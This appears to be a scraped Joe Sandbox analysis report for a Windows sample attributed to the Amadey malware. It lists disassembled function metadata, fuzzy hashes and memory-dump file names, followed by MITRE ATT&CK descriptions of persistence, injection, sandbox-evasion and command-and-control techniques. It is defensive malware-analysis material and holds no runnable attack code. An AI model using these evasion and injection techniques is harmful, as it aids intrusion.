Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#a$P#a
API String ID: 2970364248-1545809882
Opcode ID: 45c1aa6588253f35319913fefb31017924000aed6530104cbc86e422b5a76741
Instruction ID: 26059a299d743ecbe28d7fd7e419f56aaef2b57984f6e6776c4d3beea946d631
Opcode Fuzzy Hash: 45c1aa6588253f35319913fefb31017924000aed6530104cbc86e422b5a76741
Instruction Fuzzy Hash: F9718171E002499FDB04CFA8D891BDEFBB6EF59310F14812DE805A7381E774A994CBA5

Function 00612AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00612B23

Strings

P#a, xrefs: 00612B2E
P#a, xrefs: 00612B18
This function cannot be called on a default constructed task, xrefs: 00612B03

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#a$P#a$This function cannot be called on a default constructed task
API String ID: 2659868963-540208785
Opcode ID: 9b76db3f71a2dba300db713d563b7a8e6ec2df65a4d1aea1b0b2a8cd79204e9b
Instruction ID: 6de713965bcb4e5909f827ef59d9f685448b48672598d089df4fbb5112086701
Opcode Fuzzy Hash: 9b76db3f71a2dba300db713d563b7a8e6ec2df65a4d1aea1b0b2a8cd79204e9b
Instruction Fuzzy Hash: C8F0967091031D9BC714DF68E8419DEBBEE9F15304F5041ADF84997701EB70AA948B99

Function 00612440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0061247E

Strings

P#a, xrefs: 00612486
P#a, xrefs: 0061246D
'kbd+g, xrefs: 00612440

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'kbd+g$P#a$P#a
API String ID: 2659868963-2273333581
Opcode ID: b51582efccda8c6865d1f93c590f3c9f26d9003fba101ecee7adbe422faa19dd
Instruction ID: 4ef64c4442a34abb3cf1d9d16a17f4ccb180010125fbe4066c600e1aa4efb6dd
Opcode Fuzzy Hash: b51582efccda8c6865d1f93c590f3c9f26d9003fba101ecee7adbe422faa19dd
Instruction Fuzzy Hash: B8F0E5B191020D67C714EFE4D80188AB7ADDE15310B008A39F654E7600F7B0FA5487A9

Function 0064C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0064CA37

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 5b8ccff4ae68d00bdc58bbe6a102785fa5f5fa8cc6777ee8d6671de2be0f4a1e
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 02B14932A022459FDB51CF68C881BFEBBE7EF55360F1481AAE845EB341D6349D42CB64

Function 0062BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0062BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0062BB14
_xtime_get.LIBCPMT ref: 0062BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0062BB43

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: fbe7177e9b930a56c333ddfd2bd76d1aa9be8c700cccd19a1899f2e84cecf4e9
Instruction ID: 16a0d5f7c5ad8a73f5928d49a2ff20f8373da775425cc6a32ae499566d2c0e22
Opcode Fuzzy Hash: fbe7177e9b930a56c333ddfd2bd76d1aa9be8c700cccd19a1899f2e84cecf4e9
Instruction Fuzzy Hash: 24212C71A005299FDF50EFA4EC419AEBBBAEF08724F004069F501A7261DB70AD418FA5

Function 00627040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0062726C

Strings

`zb, xrefs: 00627282
@.a, xrefs: 00627250

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.a$`zb
API String ID: 3366076730-1366881021
Opcode ID: 8263e4fd1e54266a06fb20b37dc383d5e95795c56b60cc85180d803fb8383873
Instruction ID: 15dbd51e431d7816a6db732d8183db7b25bad9bbbaa17463121510b0854b51a6
Opcode Fuzzy Hash: 8263e4fd1e54266a06fb20b37dc383d5e95795c56b60cc85180d803fb8383873
Instruction Fuzzy Hash: 77A139B0A01A25CFDB21CFA8D984B9EBBF2BF49710F188159E819AB351D7759D01CF90

Function 0064F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0064F263

Strings

`'g, xrefs: 0064F235
8"g, xrefs: 0064F30B

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"g$`'g
API String ID: 3903695350-151162620
Opcode ID: 8b2dafeca852423a3ef4f3731ff5c04772bb907fe8997628ca9cd78ce61525c5
Instruction ID: 5ad4f9270ce868cdd7578c39c50635f89d4a14a217dc63a263fd535aec55b3af
Opcode Fuzzy Hash: 8b2dafeca852423a3ef4f3731ff5c04772bb907fe8997628ca9cd78ce61525c5
Instruction Fuzzy Hash: 39315E31600205AFEBA1AFB8E945B9B77EBAF04310F10452DE45AD7251DF72ED808B55

Function 00613930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00613962
__Mtx_init_in_situ.LIBCPMT ref: 006139A1

Strings

pBa, xrefs: 00613940

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pBa
API String ID: 3366076730-1397411083
Opcode ID: 44c94737f2381316e8cd8e799aff1520d1282b75a93ab7ed5b18514144fa3714
Instruction ID: ca4b3e73eb2e6de6685ce045ad5d020fe03e4c892c568c32e09a6c7be8d45947
Opcode Fuzzy Hash: 44c94737f2381316e8cd8e799aff1520d1282b75a93ab7ed5b18514144fa3714
Instruction Fuzzy Hash: 2F4104B0601B059FD720CF19C588B9ABBF5FF44315F14861DE86A8B341E7B5AA55CB80

Function 00612520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00612552

Strings

P#a, xrefs: 0061255D
P#a, xrefs: 00612547

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#a$P#a
API String ID: 2659868963-1545809882
Opcode ID: 47dfa98e2d4f2cac4aec763ea55353fa35054d610bef51b6d87848cc2af3863c
Instruction ID: 2ff6e0165357b979ebfdfe66c1ece155c11cbf740a010d80b560585bcdfa965f
Opcode Fuzzy Hash: 47dfa98e2d4f2cac4aec763ea55353fa35054d610bef51b6d87848cc2af3863c
Instruction Fuzzy Hash: D7F0A771D1120DABC714DF68D94198EBBF6AF55304F1082AEE445A7300EB705A94CB99

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LbMTyCFRzs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

